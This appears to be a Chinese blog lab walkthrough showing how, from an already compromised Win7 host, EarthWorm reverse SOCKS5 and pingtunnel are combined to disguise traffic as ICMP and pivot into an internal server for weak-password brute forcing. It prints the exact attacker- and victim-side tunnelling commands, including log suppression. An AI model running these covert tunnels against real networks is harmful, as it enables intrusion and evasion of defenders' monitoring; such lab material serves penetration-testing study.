• ew+pingtunnel组合建立socks5隧道


     
     
     
     
     
     
     
     
     
     
     

    0x00 实验环境

    攻击机:win(192.168.43.131)+kali(192.168.43.217)

    受害机:win7(IP:192.168.43.50、192.168.59.133;双网卡,一个公网一个内网)、winserver2008(IP:192.168.59.18;仅主机:一个内网)

    0x01 实验效果

    在已经拿到公网win7服务器的前提下,通过ew与pingtunnel搭建能通往winserver2008的隧道,获取winserver2008的服务器权限

    0x02 实验准备

    工具:ew、pingtunnel、proxifer(代理工具)

    https://github.com/idlefire/ew
    https://github.com/esrrhs/pingtunnel

    proxifer官网自行下载

    工具介绍:

    ew

    EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。

    pingtunnel

    pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具

     

     0x03 打通隧道

    1、kali执行:

    ./ew_for_linux64 -s rcsocks -l 10080 -e 8898
    
    10080作为连接隧道的端口,8898作为隧道的通道,可以想象为,通向内网主机的路口为10080,走的这条路为8898。8898上所有的人(流量)都会通往10080这个路口。

    2、kali执行:

    ./pingtunnel -type server
    意思是将ew启动的sock5协议转换为icmp协议来隐藏传输

    3、肉鸡win7执行:

    pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.43.217 -t 192.168.43.217:8898 -sock5 -1 -noprint 1 -nolog 1
    意思是8898这条路上的sock5流量信息隐藏为icmp类型的数据在本肉鸡的9999端口进行转发。

    4、肉鸡win7执行:

    ew.exe -s rssocks -d 127.0.0.1 -e 9999
    在本肉鸡9999端口开启转发流量

    出现上述错误时,是因为你在运行pingtunnel时没有以管理员的身份运行cmd

    如下就可以显示成功了:

    5、kali上出现OK字样时表示代理搭建完成:

    6、使用proxifer来访问内网:

    此时再次访问win2008那台仅仅为内网的主机:

    7、kali通过win7搭建了隧道,实现了内网横向的证明:ping winserver2008是不通的,但是挂好代理可以进行59.18的数据库弱口令爆破!

  • 相关阅读:
    Windows下如何检测用户修改了系统时间并且把系统时间改回来
    洛谷 1220 关路灯
    洛谷 2279 [HNOI2003]消防局的设立
    洛谷 1498 南蛮图腾
    bzoj 1036 [ZJOI2008]树的统计Count 树链剖分模板
    codevs 1021 玛丽卡 SPFA
    codevs 1077 多源最短路 flyod
    Vijos P1133 装箱问题 01背包
    codevs 1069 关押罪犯 并查集
    codevs 1073 家族 并查集
  • 原文地址:https://www.cnblogs.com/cute-puli/p/15213394.html
Copyright © 2020-2023  润新知